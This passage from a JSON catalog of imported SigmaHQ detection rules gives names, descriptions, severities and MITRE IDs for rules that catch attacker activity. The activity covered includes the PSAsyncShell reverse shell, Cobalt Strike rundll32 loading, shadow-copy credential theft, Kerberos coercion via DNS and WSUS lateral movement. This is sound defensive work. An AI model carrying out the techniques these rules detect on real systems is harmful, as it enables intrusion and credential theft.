"source": "SigmaHQ/sigma", "source_id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml" } }, { "id": "sigmahq-sigma-ae48ab93-45f7-4051-9dfe-5d30a3f78e33", "type": "detection", "name": "Spring Framework Exceptions", "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/spring-framework-exceptions.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/spring/spring_application_exceptions.yml" } }, { "id": "sigmahq-sigma-ae6f14e6-14de-45b0-9f44-c0986f50dc89", "type": "detection", "name": "Change Default File Association To Executable Via Assoc", "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. 
Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-default-file-association-to-executable-via-assoc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" } }, { "id": "sigmahq-sigma-ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", "type": "detection", "name": "Suspicious PowerShell Invocations - Specific", "description": "Detects suspicious PowerShell invocation command parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-invocations-specific.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" } }, { "id": "sigmahq-sigma-ae9b0bd7-8888-4606-b444-0ed7410cb728", "type": "detection", "name": "Writing Of Malicious Files To The Fonts Folder", "description": "Monitors for possibly malicious files being hidden in the C:\\Windows\\Fonts\\ location. This folder does not require administrative privileges to write to or execute from.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1211", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/writing-of-malicious-files-to-the-fonts-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" } }, { "id": "sigmahq-sigma-ae9c6a7c-9521-42a6-915e-5aaa8689d529", "type": "detection", "name": "CobaltStrike Load by Rundll32", "description": "Rundll32 can be used by Cobalt Strike with the StartW export function to load DLLs from the command line.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobaltstrike-load-by-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" } }, { "id": "sigmahq-sigma-ae9d710f-dcd1-4f75-a0a5-93a73b5dda0e", "type": "detection", "name": "Launch Agent/Daemon Execution Via Launchctl", "description": "Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.001", "T1543.001", "T1543.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/launch-agent-daemon-execution-via-launchctl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae9d710f-dcd1-4f75-a0a5-93a73b5dda0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_launchctl_execution.yml" } }, { "id": "sigmahq-sigma-aeaef14c-e5bf-4690-a9c8-835caad458bd", "type": "detection", "name": "PIM Alert Setting Changes To Disabled", "description": "Detects when PIM alerts are set to disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pim-alert-setting-changes-to-disabled.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aeaef14c-e5bf-4690-a9c8-835caad458bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_pim_alerts_disabled.yml" } }, { "id": "sigmahq-sigma-aef9d1f1-7396-4e92-a927-4567c7a495c1", "type": "detection", "name": "Suspicious Git Clone", "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1593.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-git-clone.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_git_susp_clone.yml" } }, { "id": "sigmahq-sigma-af1ac430-df6b-4b38-b976-0b52f07a0252", "type": "detection", "name": "OpenCanary - HTTP POST Login Attempt", "description": "Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-http-post-login-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af1ac430-df6b-4b38-b976-0b52f07a0252", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_http_post_login_attempt.yml" } }, { "id": "sigmahq-sigma-af202fd3-7bff-4212-a25a-fb34606cfcbe", "type": "detection", "name": "Modifying Crontab", "description": "Detects suspicious modification of crontab file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modifying-crontab.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af202fd3-7bff-4212-a25a-fb34606cfcbe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml" } }, { "id": "sigmahq-sigma-af491bca-e752-4b44-9c86-df5680533dbc", "type": "detection", "name": "Finger.EXE Execution", "description": "Detects execution of the \"finger.exe\" utility.\nFinger.EXE or \"TCPIP Finger Command\" is an old utility that is still present on modern Windows installation. 
It displays information about users on a specified remote computer (typically a UNIX system) that is running the finger service or daemon.\nBecause this utility is old and machines running the finger service are rare, any execution of \"finger.exe\" can be considered suspicious and worth investigating.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/finger-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af491bca-e752-4b44-9c86-df5680533dbc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_finger_execution.yml" } }, { "id": "sigmahq-sigma-af4c4609-5755-42fe-8075-4effb49f5d44", "type": "detection", "name": "Microsoft Excel Add-In Loaded From Uncommon Location", "description": "Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-excel-add-in-loaded-from-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af4c4609-5755-42fe-8075-4effb49f5d44", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_excel_xll_susp_load.yml" } }, { "id": "sigmahq-sigma-af4c87ce-bdda-4215-b998-15220772e993", "type": "detection", "name": "Suspicious Process Discovery With Get-Process", "description": "Get the processes that are running on the local computer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1057" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-discovery-with-get-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af4c87ce-bdda-4215-b998-15220772e993", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" } }, { "id": "sigmahq-sigma-af5732ed-764e-489d-826d-0447c8b36242", "type": "detection", "name": "Windows MSIX Package Support Framework AI_STUBS Execution", "description": "Detects execution of Advanced Installer MSIX Package Support Framework (PSF) components, specifically AI_STUBS executables with original filename 'popupwrapper.exe'.\nThis activity may indicate malicious MSIX packages built with Advanced Installer leveraging the Package Support Framework to bypass application control restrictions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1553.005", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", 
"tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-msix-package-support-framework-ai-stubs-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af5732ed-764e-489d-826d-0447c8b36242", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msix_ai_stub_execution.yml" } }, { "id": "sigmahq-sigma-af6925b0-8826-47f1-9324-337507a0babd", "type": "detection", "name": "Azure DNS Zone Modified or Deleted", "description": "Identifies when DNS zone is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-dns-zone-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af6925b0-8826-47f1-9324-337507a0babd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_dns_zone_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-af6c3078-84cd-4c68-8842-08b76bd81b13", "type": "detection", "name": "OpenCanary - HTTP GET Request", "description": "Detects instances where an HTTP service on an OpenCanary node has received a GET request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], 
"log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-http-get-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af6c3078-84cd-4c68-8842-08b76bd81b13", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_http_get.yml" } }, { "id": "sigmahq-sigma-af77cf95-c469-471c-b6a0-946c685c4798", "type": "detection", "name": "Proxy Execution Via Wuauclt.EXE", "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/proxy-execution-via-wuauclt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af77cf95-c469-471c-b6a0-946c685c4798", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wuauclt_dll_loading.yml" } }, { "id": "sigmahq-sigma-afd12fed-b0ec-45c9-a13d-aa86625dac81", "type": "detection", "name": "Create Volume Shadow Copy with Powershell", "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/create-volume-shadow-copy-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" } }, { "id": "sigmahq-sigma-afd3df04-948d-46f6-ae44-25966c44b97f", "type": "detection", "name": "PSAsyncShell - Asynchronous TCP Reverse Shell", "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psasyncshell-asynchronous-tcp-reverse-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "afd3df04-948d-46f6-ae44-25966c44b97f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" } }, { "id": "sigmahq-sigma-afe52666-401e-4a02-b4ff-5d128990b8cb", "type": "detection", "name": "Suspicious Greedy Compression Using Rar.EXE", "description": 
"Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-greedy-compression-using-rar-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rar_susp_greedy_compression.yml" } }, { "id": "sigmahq-sigma-aff229ab-f8cd-447b-b215-084d11e79eb0", "type": "detection", "name": "Remote Schedule Task Lateral Movement via SASec", "description": "Detects remote RPC calls to create or execute a scheduled task via SASec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053", "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-schedule-task-lateral-movement-via-sasec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aff229ab-f8cd-447b-b215-084d11e79eb0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" } }, { "id": "sigmahq-sigma-aff715fa-4dd5-497a-8db3-910bea555566", "type": "detection", "name": "DNS Query to External Service Interaction Domains", "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1595.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-external-service-interaction-domains.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aff715fa-4dd5-497a-8db3-910bea555566", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_external_service_interaction_domains.yml" } }, { "id": "sigmahq-sigma-aff815cc-e400-4bf0-a47a-5d8a2407d4e1", "type": "detection", "name": "Use Get-NetTCPConnection - PowerShell Module", "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-get-nettcpconnection-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" } }, { "id": "sigmahq-sigma-b02f9591-12c3-4965-986a-88028629b2e1", "type": "detection", "name": "Azure Kubernetes Pods Deleted", "description": "Identifies the deletion of Azure Kubernetes Pods.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-pods-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b02f9591-12c3-4965-986a-88028629b2e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_pods_deleted.yml" } }, { "id": "sigmahq-sigma-b04934b2-0a68-4845-8a19-bdfed3a68a7a", "type": "detection", "name": "App Assigned To Azure RBAC/Microsoft Entra Role", "description": "Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/app-assigned-to-azure-rbac-microsoft-entra-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_role_added.yml" } }, { "id": "sigmahq-sigma-b0524451-19af-4efa-a46f-562a977f792e", "type": "detection", "name": "ShimCache Flush", "description": "Detects actions that clear the local ShimCache and remove forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/shimcache-flush.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b0524451-19af-4efa-a46f-562a977f792e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml" } }, { "id": "sigmahq-sigma-b056de1a-6e6e-4e40-a67e-97c9808cf41b", "type": "detection", "name": "AWS Route 53 Domain Transferred to Another Account", "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/aws-route-53-domain-transferred-to-another-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml" } }, { "id": "sigmahq-sigma-b07e58cf-cacc-4135-8473-ccb2eba63dd2", "type": "detection", "name": "Potential Kerberos Coercion by Spoofing SPNs via DNS Manipulation", "description": "Detects modifications to DNS records in Active Directory where the Distinguished Name (DN) contains a base64-encoded blob\nmatching the pattern \"1UWhRCAAAAA...BAAAA\". This pattern corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure,\ncommonly used in Kerberos coercion attacks. Adversaries may exploit this to coerce victim systems into authenticating to\nattacker-controlled hosts by spoofing SPNs via DNS. 
It is one of the strong indicators of a Kerberos coercion attack,\nwhere adversaries manipulate DNS records to spoof Service Principal Names (SPNs) and redirect authentication requests, as in CVE-2025-33073.\nPlease investigate the user account that made the changes, as it is likely a low-privileged account that has been compromised.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-kerberos-coercion-by-spoofing-spns-via-dns-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b07e58cf-cacc-4135-8473-ccb2eba63dd2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_kerberos_coercion_via_dns_object.yml" } }, { "id": "sigmahq-sigma-b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", "type": "detection", "name": "Cisco Show Commands Input", "description": "See what commands are being entered on the device by other users; full credentials can be present in the history", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-show-commands-input.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_input_capture.yml" } }, { "id": "sigmahq-sigma-b0ce780f-10bd-496d-9067-066d23dc3aa5", "type": "detection", "name": "HackTool - SharpWSUS/WSUSpendu Execution", "description": "Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.\nWindows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpwsus-wsuspendu-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b0ce780f-10bd-496d-9067-066d23dc3aa5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml" } }, { "id": 